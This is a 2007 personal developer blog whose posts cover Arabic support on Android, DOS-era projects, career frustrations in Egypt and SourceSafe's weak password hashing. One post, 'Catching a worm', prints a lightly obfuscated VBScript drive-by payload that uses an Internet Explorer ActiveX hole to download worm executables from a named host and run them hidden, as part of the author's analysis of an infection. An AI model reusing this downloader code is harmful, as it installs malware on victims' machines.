Search This Blog

Wednesday, December 26, 2007

Sourcesafe Hackability

Peace be upon you,
Today I am going to hence about something that is critically dangerous, it's SourceSafe, I recommend to read the coming paragraph it will save lot of explanation


"Quoted" - http://keir.net/vsscrack.html

Visual SourceSafe (VSS) has a very weak password management system. There is one file stored within the VSS directory structure on the VSS server called um.dat (usually in the data sub-directory). This file contains all user names together with a hash of their passwords. The hashing process is poorly designed and insecure, not just due to the size of the resultant hash (2 bytes!) but also due to the extremely simple algorithm used to generate it. Such is the weak nature of the hashing algorithm that there are literally hundreds of easily obtained passwords that result in the same hash as the real password. In other words, the hashing algorithm used is extremely prone to collisions. So just bear in mind -- the passwords that this program produces are not necessarily (and in fact are probably NOT) the actual passwords initially created by the user, but will still give you the same level of access to VSS as if you had used the same original password. As an example, using a largish word list, my own password hash produced nearly 600 equivalent matching passwords, none of which was the true original but any of them could have been used in place of it.

Now after you read that, it is matter of minutes to crack the toughest password in SourceSafe, I just want to draw your attention that there is lots of other tools that work as source control with more safety and flexibility also it's open source which means you can develop your own version of source control with custom security you made or install from anywhere as plug-in, By the way, threre is HELL of tools that crack SourceSafe Password, also there is no way to secure it, as long as user has access to the Password file, it is done, anyways here is some recommendation for source control application that can be used to protect our code,

http://en.wikipedia.org/wiki/Concurrent_Versions_System
http://svnbook.red-bean.com/

Personal recommendation for client tools
CVS - http://www.tortoisecvs.org/
SVC - http://tortoisesvn.tigris.org/

Hope this article informative and helpful

P.S: there is many tools around I didn't want put any of it, to avoid anything that may cause trubles

BR
Ahmed Essam

Some way to hack GSM Networks

Peace be upon you

how are you guys? I will just hint for this thing, it's small device for GSM software developers, this device is used to test the application that is on the SIM Card that is provided by GSM Network provider, here is link for the device I am talking about it, it's Called detective,
http://www.gemalto.com/products/detective/
I hope to get one :D, I don't think that it is available to anyone to buy it.
I am not saying go hack GSM networks, this things is very simple I am just telling that there is device monitor the commands that is going out and coming in, :D I am not saying more :D

Thanks for your time

BR
Ahmed Essam

Tuesday, December 25, 2007

Egyptian Companies Part 1

Peace be upon you

This days I have many struggling things in my mind, here is listing in what I am thinking about:
  1. I wanna have a good chance in big respectable company (for me Microsoft is my Dream)
  2. I wanna do something extra ordinary by doing what I am thinking about, I wanna makeover the Software industry in Egypt, I have a very nice thoughts that could make it better with practical way go on with this ideas.
  3. I wanna start my POOR company and start running my own shows

To have the right answer I have to find the right question, that's what's killing me right now, actually I can't find the "Question" , right now all I am thinking about that I am lonely in what I am thinking about, I need someone to share what I am thinking about, all people here are so negative no one wanna take his shot and make his dream real,

sometimes I feel that I should take it as it is of course not for life, but this is not creative way to solve the problem, to solve problem, I have to be like the problem, I have to behave like the problem to understand it, this point I call the surrendering for the sickness, but it's not for life, sometimes u need to have a break to fight back with more powerful attack that is really give you back what you want, this what I think I am in now, I am taking my breath, to fight back this sleepy community that's can't have a very tiny step to make the life better, I think I have now my decision I will keep on in what I have now,

head capital, as many of limited vision of managers here they never think that "Head capital of any software company is its Employees", they never think like Bill gates "Microsoft" and Steve Jobs "Apple" they were the First employees that make their companies the best can that it can be, What I am dreaming is to have my chance,

actually I am so depressed of the point we have here, Software companies in Egypt consider the Employee

  1. as asset, they have life time then throw it and find someone else to do the job.
  2. as Consumable, they try to make use of the employee as much as they can
  3. as number, some big companies treat their employees as number, any one working is just number, this number is do what is suppose to do, if this number didn't they will get anther number to do that, they don't care about the Employee it self.
  4. as container, they suck the employee they take what ever they can take
  5. VERY FEW, treat Employee as Human "I heard a lot about ITWorx" that they do so with their employees, they try to give them what they need to be creative,

Most of the Types that I have sort up there are common on thinking that they giving over deserved salary, when you talk to the higher management they always think about the money, they never think about the spiritual part that give the mind the power of creativity, this managers are not so creative because they keep thinking in the numbers they never looks what is behind it, they never believe that there is something else beside the numbers, it's numbers soul, the number soul can give you more than the number it self, anyways it will take hell of time to talk about it

something funny, I have been working now for almost 3 years in software development, I work for 5 Companies

  1. EgyComp Very Good team, Very Ugly Management
  2. Agiliance ME Good team, Bad spirit ( bad enough until the company totally fall )
  3. InfoSoft Very Good Team, Very Good Management, inconvenient market
  4. Imaginet software Very Good Team, Very Good Management, bad resources handling
  5. GET Group Struggling great good team,great international projects, Cold feeling of employees (Cold to death)

Why I keep move on, I like to work with a free mind, Software industry totally depend on the creativity, you can't just put people in bad atmosphere and push them to do things they don't want to do and expect that they will give something back to you, this is what really happen, every one is working in software company in Egypt is like a slave, this is what American guy said to some of my colleague at the work, this is true, we are slaves why do the WRONG things and we can't say NO, we have minds that can clearly separate between right and wrong, for me I am sick of the word "Just make it work", this is not right, making it just work doesn't mean that it is working right,

at the End I hope that you didn't get depressed because of what I am saying, it is just me that have this feeling, I don't know if the others has the same or not, but this what my eyes can see, but I am not that negative, I always take steps to change things, for me I am satisfied of what I am doing, I am move a lot and I will move again until I get what I want, also in moving I learn a lot, I learn things about people I see and types of customers, I work in many great things, I was working for mobile development ( thousands using the software that i am doing ) in other hand I did International E-Government projects (Millions are connected to my Server) ( hundreds using my Embedded application ), I believe all of that was very good for me it cause that my knowledge got wider in the software industry and give me a lot that others can't really have.

thanks for your time :)

BR

Ahmed Essam

Sunday, December 09, 2007

Linux Manual

Peace be upon you

When I was in the institute, I was working at some place "Online Magazine", this Magazine had published Linux Mandrake CDs, and I was responsible for the support for any a technical issue, in my free time, I have translated the manual,
http://www.is-broadcast.com/Downloads/Books/Linux%20Help%202002.zip

but no one ever take it, now it is free between your hands :)
I hope that it will be helpful for you

thanks for your time.

Tuesday, December 04, 2007

How Do Arabization Works? The Idea behind Arabization

Peace be upon you,



as requested from many guys I am writing this topic, some people was asking how the Arabization works?
here is a brief answer for this question, I will sort it be stages,
First: you have to ensure that the system has a free font type support
why is it so important?
simply, the free type gives you a very good ability which is the system will draw the character for you, you don't have to think how the fonts will look like, how will u draw it all of this question will be disappear with simple idea, it is simple but powerful
What if the system doesn't support Free Type?
you will have to do it your self, you will have to draw the character by your self, for example, you can put the character in BMP or JPG, and do some graphics engine that put characters together and make it look like one sentence
Second: Bi Di, this stage is very important and take a lot of time to be done, if you are going to do it by your self,
fortunately that there is library and it is open source, it is called "FriBiDi"
here is links for this GREAT project
http://sourceforge.net/projects/fribidi

http://fribidi.freedesktop.org/wiki/
this library will help you to rearrange the Arabic Characters, because Arabic from right to left, the whole words will be reversed, so you will have to fix it, also there is many consideration that this library solve, like what if there is English word in the middle of the statement, then it will be MESS, this library will solve the problem

there is one more thing, when I was implementing the algorithm I face a very nice problem, the whole word length, when you fix the string you make like, the first character will be the last and vise versa, when you put this statement in Text Box or any object to display, you will have this problem which is , the lines will be reversed :D
the problem can be solved by detecting the character width, and display area width, so you only put what is enough to display per line, this will help to avoid this problem

Last : Shaping, shaping is very nice and it is totally take no time to do it, simple you will detect the character location ( Start, Middle, End or Standalone ) because Arabic character has 4 shapes, you have to do this part, after that you will find the Arabic string looks OK, and ready to print

How did I do that with Android?

simply when I was watching the Introduction video, I notice that the guy said "Free Type Support"
I smiled then I open the Emulator, and I started looking for the font folder,
as I don't know how to register new font in Android, I replaced the Original font
the cool part comes when I noticed that they have already done the Bi Di support
at the moment I released that all it needs is just Reshape the character the statement
I did this part and guess what it WORKS

there is other many consideration about the Arabization, if you face some please don't hesitate to ask




I hope that this topic was informative for you :)



Thanks for your time

Ahmed Essam

Monday, November 26, 2007

Once before I was in the news paper

Peace be upon you



I am going to show you something that I liked when I was little younger, I was in the newspaper because of something that I have done, of course it was application :D, actually it happens twice, once for Web navigator, and the other for web site that I have done for some practices

see a snapshot of the news paper :D




application to make it easier to navigate the web

Title of the topic on the main page of the newspaper

the main topic about the website to help student to follow the lectures from their home




this is a link for the web site http://www14.brinkster.com/mo7dra/main.asp


I hope that it's cool :D

Saturday, November 24, 2007

Java is better with Android

Peace be upon you
today I will give you something, it's not new but it is for sake of explanation,
I was insisting that C++ is better in development for mobile application, as u know that Google never release something for C++ developer to run under Android, I kept digging in this issue until I reach to something nice, it's Arm Tool chains, this allow to generate executable for the cutey Android, but unfortunately it does not have any libraries supporting Android, so the only way for me to use the ".so" libraries is through "dlopen" and "dlsym", but there is a problem, how could I know the function prototype, what is the parameter and what is the lengths , many questions starts to hit my head, so I opened my lovely tool IDA Pro, and I started to do some Reverse Engineering to the libraries, I just wanna try to play something, then I noticed something strange, I noticed , that the ".so" file that I was working on, it has the same functions name, and same form, WAIT, what is that, check the coming 2 figures


IDA Pro "keyCharacterMap", see the follower part of text, it seem like Rubbish but focus and see what is written


this is the page from Google Android help


by the way here is link for the tool chains http://www.codesourcery.com/gnu_toolchains/arm/download.html



Bluetooth Expectation


mmm, here I don't know how to start, but I will tell you what I expect, u know that the Emulator now doesn't support the bluetooth, and no one able to test his blue tooth application -by the way the bluetooth classes has some wired names , anyways u will find it under 'ord.Bluez"-, so I though that it will be cool if I reach to something about it, because most off Mobile application must has reach connectivity abilities, I found something interesting which is, there is user in the OS Users, gues what is the name ???? it is Bluetooth,



so I expect that the bluetooth will work as user, which means that Google guys will not have to care about "Security" and many things that the Linux kernel will take care off, I hope that my expectation is correct, I will be so happy that happens :D, anyways I hope that this topic is informative and helpful to you :)

tanks for your time

Ahmed Essam

Tuesday, November 20, 2007

Developing for Android under linux

Peace be upon you



I hope you all is fine and happy, Today I am going to put a simple hint that really will help developers who intend to developer something for android, first of all, you must have some experience with Linux, it is really important to help you get through some blocks you will face in the platform, then I strongly recommend that you use Linux for development, you will not like to write some Dos commands then Linux commands, :D it will be like a mess :D, anyways it is just recommendation , it's not important that I am right, also if someone find something better please go ahead and post a comment, one thing that I have noticed while I am working on the platform that it mostly previous Open source project and collected together, really it's Wow, also this SDK has some very cool tools that helps to simulate real devices VERY EASILY, not like most of Mobile development SDKs,check the snapshots and tell me what do u think, I am sorry I don't write a lot, but I am really so sick and little tired, so excuse me and pray for me to be OK











Thanks for your time

Ahmed Essam

Tuesday, November 13, 2007

The Applicability for Arabizing Android

Peace be upon you



did you hear about the new Google framework for mobile, well there is something new called Android, this thing is really cool , I recommend that you read more about it http://code.google.com/android



anyways , lets get back to out target , I was looking for something that make me able to show Arabic words on this device "right now it's Emulator", and ALLAH bless me to find away to do that, I wanna show you the sample of what I have got




as you can see

Fig.1 - show the sample without doing anything

Fig.2- show the sample after installing the Arabic font

Fig.3- show the sample with Arabic font and reshaped string

I will explain later the details of this operation and how to do it, as I am so busy delivering a very huge project I can't do anything right now, so please pray for me to have some free time, and isA I will do my best to help you all in this issue, thanks for your time

THANKS MOHAMED MOHSEN ( he told me that there is something called Android :D, which means that I am ignorant, he is really very smart guy and very knowledge rich ) again thanks to you Mohamed and I hope you have a huge progress in your career

Have a nice life :)

Monday, October 15, 2007

Virtual visit to USA

Peace be upon you

as you know that I like Microsoft so much, I wanted to do something cool :D which is, have snapshot by satellite for Microsoft and set it as back ground on my PC, when I was on my way to "1 Microsoft way, Redmond" I found something so strange, new button on Google called "street view", as I like to open any new thing :D even it is a bomb :D, I clicked on the button, and guess what, I saw little cameras all over the map, in this moment I street to feel exciting, I always liked Manhattan street, so I wrote in the search that, and when it opens I found new thing, it is little orange guy, I clicked on this guy, anther overlapped window opened, and I started to be able to navigate on the street, WAW, I am in USA and I am walking , I am able to see shops and everything, WAW, I said to my self it's not enough lets get more, I get back to Google search and I typed "List of street view in Google maps", and I got this beautiful link,

http://maps.google.com/maps?f=q&hl=en&ie=UTF8&ll=37.09024,-95.712891&spn=47.167389,92.8125&z=4&om=1&layer=c&utm_campaign=en&utm_source=en-ha-na-us-google-svn&utm_medium=ha
see it, you will find all the placed that has street view in USA, after I got a very well training on Google street view it took about "10 minutes, to read and figure out what it is." I took some snapshots to several places in USA

lets see it








so what do you think about that? I think it is AMAZING, and very cool to have such service in beloved Google, now I leave it to you, I hope that it is OK and the topic was useful for you, thanks for your time :)

Yours,
Ahmed Essam

Monday, October 01, 2007

Performance Tools AMD vs Intel

Peace be upon you

as you can notice that I care about performance and the "unstated requirement", today I am gonna just point a finger to some performance tools that is really fine for people to use to enhance their software and get better results, I will show two important tools for this issue "Performance analysis", First as I like Intel it will be the Intel tool "VTune", this tool is amazing I read a lot about it and I really like this tool , this tool give you information about your application run time that you will never get my logging or debugging or anything, it has set of tools inside the VTune , let's see what is inside the bag of VTune, Vtune has many tools that for sure will be very useful
  1. Time based sampling
  2. Call graph
  3. Event based sampling
  4. Counter monitor

every on of this is more than just a word, it is really a very huge tool that can relive you from tans of wasted time, this tool is very well designed to help smart people to finish their work in very highly performance manar, this tools must be used in something like smooth dance way, you can't just use one tool for the job, every tool of this tools provide you with some information, after that you must be smart enough to collect this information together to see what you have got, it's like puzzle, only smart people will know how to use and utilize such tool, as I like this tool very much I think it's so clear for anyone to use such tool, it's only a matter when to use what.

this is for sweet Intel tool, lets go for the next one "AMD" the AMD tool called "Code Analyst" I didn't dig a lot on this tool but I think it has more option and accessibility for other things but I think it will be low level and more complex for developer to use such tool, anyways this is what I have saw in a very quick view for the application

  1. investigate L2 cache access
  2. investigate branching
  3. investigate data access
  4. investigate instruction access
  5. pipe line simulation
  6. thread profile
  7. time-based profile

what I really like is the thread profile, it really will help a lot for Multi threading application , you know it is very complex to trace application that has many threads, so such thing I think it may help, by the way I heard that Intel has thread profile too but I didn't see it before, also Microsoft will add the thread profile in VS.NET 2008 as I think, which will be amazing , anyways this topic need a lot of exercise to reach to a reasonable bench mark, right now I am so busy , but when I get some free time I will try to do something about it,

by the way , Intel tools will not run on AMD processors and AMD tools will not run on Intel processors,

also this tools is to enhance a performance as general system , sometimes when the tool takes you to lower level it will be tied to the processor, so u have to be careful about that

one thing else that I forgot, AMD has some libraries to enhance math on their Processors, also Intel has their libraries that is work very well on Intel processor, u have to take care that such library depend on something on the Processor structure which means that the application may not work on other platforms

I hope that this topic informative and useful

thanks for your time :)

Saturday, September 15, 2007

Text mood menus days

Peace be upon you

here is new topic, do you remember the old days, DOS days, some people say that it was very ugly days, but I say it was informative days, and I learnt a lot by using dos, I learnt it for some reason, first when I was in school this OLD monochrome PCs with only thing available, it was at 1998, and I was in the Thanaway, Governmental school, we used to get Floppy disk that has DOS 6.22 as I remember, the only thing that can run on this disk was QBasic, C++ compilers need more space for the compiler and more space for the compiler output, so we take GWbasic and QBasic, this time Windows 98 was released, we did a lot of things with this QBasic, we used to do something new weekly, I was in a very geeky team
Ahmed Abd El Aziz - Missing and I can't find him
Ahmed Abl El Hakim - Missing and I can't find him
Ahmed Essam Naiem - it's me :)
we was always in the computers room, so we get a very low grades :D anyways, I tell this story to show you some snapshots I hope you like it :)


This is simple application for credit and debit for subscribed users


From this window you query for the user and add or subtract from his/her account

This is simple reports list


in other hand there was a tries to add Arabic support for the Dos Application, and I get it for once :D


this one is done by TC++, I made it when I was in the 3rd grade in the institute, it is something like Paint brush but it is not completely done (it was under dos)


this is the same application with Mouse support :) of course this was under dos



this is the same application in the text mood up there but this is the graphical one ( closing the application )

this was my first try to do Graphical application under dos, adding Icon was little hard this time :) but I did it , this one in QBasic

this application is the same as the one up there, this is add customer window


this is the customer listing




I used one idea implemented many times to test something else, it was the ability to create Menu based application like the ones in the POSs in the super markets , also when I first saw the GUI in windows, I decide to simulate it, and I did :) thanks to ALLAH for that :), by the way , all the source code for this stuff are available, but it was so dirty coding , it was my first tries, this code was written between 1998 and 2003 , this was my start, it was one hour per day is the available for me at the school :), also thank ALLAH for what I have now :)

see you in next topic :)

Trip to Qatar

Peace be upon you
How are you? I miss all people who read what I write :), last time I wrote something was long time ago, I am sorry people, I was away, I was in Qatar Delivering a really huge system, it is ePurse, I am one of project members, here is link for the porject
http://portal.getgroup.com/ITSolutions/EnterpriseSolutions/Pages/E-Purse.aspx

now after this long time, I will show you the good in this trip :D, I visit some place , actually it is amazing place, it's a mall when you are inside it you will find it DAY , I mean there is always sun on it also there is a moon, :D I know it's not reasonable but check out the photos,it was really a very good day :)



It is a day at 11:00 PM can you imagine it :)

shoping in the water :D if you don't afraid of sinking :D

WoW the fake sun looks cool


let's take a round with this thing :D

Me and pink panther :D



over this bridge is a restrant

is it a sunset ???

Moon :D and it is totally fake


By the way I got married last month, :) I wish I can blog more :)

Sunday, April 29, 2007

Catching a worm

Peace be upon you

it was a tough day to me, :D I was installing windows and other things that I used to use on my machin, anyways the first thing I do after installing windows is to install MSN, I got Message from someone very imortant to me, he/she sends me a link

http://th ecool pics.net/don tclick.jpg

DOn't OPEN THIS LINK IT HAS THE WORM


I opened the link, and I noticed it cause a very dilay on my machin, I said to my self wait for a second to see what is coming, nothing the page was so normal, after while I tried to open "RUN" and I found that it is "Restricted", also the Task Manager,
I used "Process Explorer" and I found that there is a very strange processes, I got MAD, WORM ON MY MACHIN, of course I tried all the old tricks, Safe mode and try to restore and workin restore point, but NOWAY, they guy who made it is very clever, he expected what I am going to do and he / she deleted my restore application :D, for his/her bad luck that I always have a running copy of windows that I don't touch, I use it only for emargance, :D I got a copy of the system restore applicaiton and I get back to clean working point :D, and I decide to know what is the hell is going on :D
I got the like that I mentioned before, I downloaded the image and I found that it is redirect to some other place that redirect ot ver far place :D , at last I got this code



of course anyone know Javascript will know esacp and unescap functions, I did a very simple page that unescae this content and put it in TextArea, and I found a very nice simple code for encrypting the content "dF(s)" this was the function name, I did anther Textarea to put the output of the Textarea , and what I saw make me get shocked :D, simply I don't update my internet explorer for this stupid exploit

I got the code that copies the worm to my machin

and here it is





< language="VBS_C_R_I_P_T">
on error resume next
dl = "http://ns1.hosting101.biz/~metalurg/images/template/YMworm.E_x_E"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="IEXPLORE.E_x_E"
set F = df.createobject("S_C_R_I_P_Ting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
< / s_c_r_i_p_t>

< language="VBS_C_R_I_P_T">
on error resume next
dl = "http://ns1.hosting101.biz/~metalurg/images/template/worm2007.E_x_E"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&amp;a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="EXPLORE.E_x_E"
set F = df.createobject("S_C_R_I_P_Ting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
< / s_c_r_i_p_t >

now after I got this simple javascript code that copies a stupid executable and run it on my machin, I have downloaded this file and I open it with Notepad :D don't laugh I don't have anything now on my HD, I found that it is encrypted , I searched for the file name with the beloved google and I foun this link that tells a lot about the virus
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM_SOHANAD.AL&VSect=T

I wish this topic useful to you, and I want to say something at last "DO N'T TRUST SOMETHING U DON'T SEE, remember there is opictal illusion :D so Don't trust anything :D"

Thursday, April 26, 2007

Messing up with Xanadux code

Peace be upon you

First of all What is Xanadux? Xanadux is a linux porting for pocket pc u can find its project at Sourceforge, I will tell u exactly what I face until I got copy of the code, first of all I tried to check out the code on the web viewer, it was nice but not enough,after while I read that I can download the code if I am useing some source control application "CVS Client", I know CVS long time ago, but I never though that it may be useful for windows users, anyways I downloaded something called "TortoiseCVS", This applicatoin is amazing, it's integarte with windows explorer, after that I created a new folder then right click on the new folder and "CVS Checkout", after that I entered the path of the CVS in the CVSRoot field then I clicked on "Fetch list", then I picked the Module that I want Xanadux it was about 13 modules, I downloaded them in about 6 hours, I had a quick view over the code, I can say it awesomem there is tans of documets, also I tried the "cyace-arm" on EVC4 and it was amazing "it compiles" with 0 errors and 0 warnings, I dind't try any other module, ALLAH willing I will continue after I get some free time and for sure I will write all I got, please give me some feed back.

P.S: Link to Xanadux on source
http://sourceforge.net/projects/xanadux
P.S: CVS Root for Xanadux
:pserver:anonymous@xanadux.cvs.sourceforge.net:/cvsroot/xanadux

Saturday, April 21, 2007

Hacking source-safe

Peace be upon you

hi people this topic will be very short, it is just a little note for Source-safe administrator,
your safe can be cracked , which means that the source code is not secured anymore, simply it can be hacked because of some human faults, people always do some brute force attack, all I can say for you that password hashing in source-safe isn't good, but you have to make some policies for protecting your code this is by making a good users hierarchy, don't give Administration permission for anyone who deal with code, use misleading names for administration permission, DO NOT EVER USE THE ACCOUNT ADMIN, there is tools that crack source-safe passwords, I think you have to make a lot of fake users, try to find any plug in for source safe that do tracking for the whole event happening on the code, that's all I can say for now, I will try to get some cases that has more help , right now I can't talk a lot about it, because if said more it will be like "how to hack source safe", for now it's ok, I will try to provide some live samples, thanks for time

Bluetooth development with Desktop

Peace be upon you

how are you guys? I miss you so much, it has been long time for the my last post, now lets begin,
I will talk today about Bluetooth (the beloved cheap communiction method), this thing is brilliant, we didn't utilize at as it must be done, anyways, I will start after my friend Mohamed Allam stop, he wrote amazing introduction about the bluetooth , I will put this document after taking his permission, anyways, lets talk about how to start developing software for bluetooth under windows, when I started this thing I was little lost, but I found that the AMAZING microsoft is always ready for any question, they did amazing work in the Windows platform SDK, I found that there is sample for bluetooth and it is so easy to reach to what they have done for us, after installing Microsoft Windows Platform SDK, you will find the sample on this path

%Program Files Folder%\Microsoft Platform SDK\Samples\NetDS\Bluetooth

now I think you should read this sample and run it then continue this topic :D I will continue if there is someone interseted on this issue, I am waiting for your feed back ;)

bye

The best farewell happen in history was mine

Peace be upon you

I have just left Imaginet, I will say it trully, Imaginet is part of my heart I don't know why I like this place but it seems that I like places that make technology, it was so hard to leave there but it is ok, the best part of it was my farewell party, it was amazing , no it was more than amazing, all people was there for me, some people don't share such parties was there, even business team was there, I was so happy, everyone of them ask me a question, I was so happy for that I was answering without any probelm, I like this people so much, I have history with them, I wanted to cry but I felt it is not suitable, people was so nice to me there

KOKO,S7syko , Maha, Zizo, Malek, Kandel, Hamed, MOHSEEEEEEEEEN :D,Ihab, Rofa, Mr.Bahaa ( The Magician ), Mostafa (IceManZ), Rasha , Hagar

this guys are amazing I can't forget them, they did a very amazing party for me,

I LOVE YOU ALL SO MUCH, I WILL MISS YOU SO MUCH

I wish you always remember me with good :) and forget about my heavy killing jokes :D, I promise that I will stop it :D

please always remember me , and I promise that I will never forget all of you,

Monday, March 26, 2007

Handle-x became international tool for hacking

Peace be upon you

My friend Ahmed Ezz recived this mail, Ahmed Ezz developed a Famous Application for network management called Handle-x , the Application is a open source, you can find it at planet source code

here is the mail he got and check how it is amazing to have such a thing :)



Hello,, its me again.. the Handle-X fan :D :D .. how are you?
how is work going with you? .. hope everything is fine.. oh i have a
website now :)
its www.darkmindz.com,, i will be glad if you took a look :) ,,, well
yesterday a guy was showing of about this trojan he made... so i took
alook at the video he made while hacking someone with it,, AND GUESS
WHAT,, the guy is a fake, he is using your trojan Handle-X as his!!!
so i thought you wanted to know cause you worked on it, and its a
brilliant program..

here is the link http://video.google.fr/videoplay?docid=8575265141611654699
check the video on the left panel, and you will seee "Handle X" this
guy owns a website too..
its www.deadly-hackers.com ,,

anyways have a good day..
thanks Ezz for your great work and ALLAH bless you :)

Saturday, March 03, 2007

Cool Error Messages

Peace be upon you



as I am a software developer I understand what error means :D, but sometimes it is ver annoying to it heat me, please check out the coming messages and tell me what to do :D







I hope that Microsoft give source code to debug it and fix it :D, that's why people likes open source, if you find bug and you cn fix it, just go a head and do that if you have time :D, I hope that someone read this and give me some explaination, I am just normal user for source safe and it gives me nice cool path for a problem in file :D, I don't want to see it , :D do they give me a debug version or something :D, anyways I don't thing it's smart move to put a file name and path in error message for your application, I have to go now, I have you have more things like that please :D send it to me :D



Thanks for your time :)






I have added this one later :)

Monday, February 26, 2007

Sunday, February 25, 2007

Microsoft/IDSA Design Competition

Peace be upon you



IT IS AMAZING, Microsoft always the best, they push people to innovate, they have done an amazing contest for PC design all I am going to do now is show you some pictures and some links for the whole story




here is the links for the whole issue
http://www.startsomethingpc.com/

http://www.engadget.com/2005/12/20/microsoft-idsa-design-competition-highlights/

http://www.engadget.com/2007/02/23/microsoft-isda-next-gen-pc-design-contest-candidates/

and the pictures






Saturday, February 17, 2007

MDC 2007 Photos

as u know I was in MDC 2007 and here is some photos for the event with some really cool guys from Arab Team and Microsoft


Arab Team and me with Andrew Pradoe and Surupa Biswas


Me with Boris Jabes (Program Manager VC++)


Me , ArabTeam with Edward Jezierski and Eugenio Pace


Me, Arab Team , Chalie Calvert and Patrick Hynds


Me, Arab Team and Chalie Calvert

Me, Arab Team and Chalie Calvert

Me, Arab Team and Mohamed Wahba ( Microsoft Egypt )


PURE Arabteam


PURE Arabteam

PURE Arabteam


For more photos check out this link :)

http://www.flickr.com/photos/27194332@N00/tags/mdc07/

I hope u like it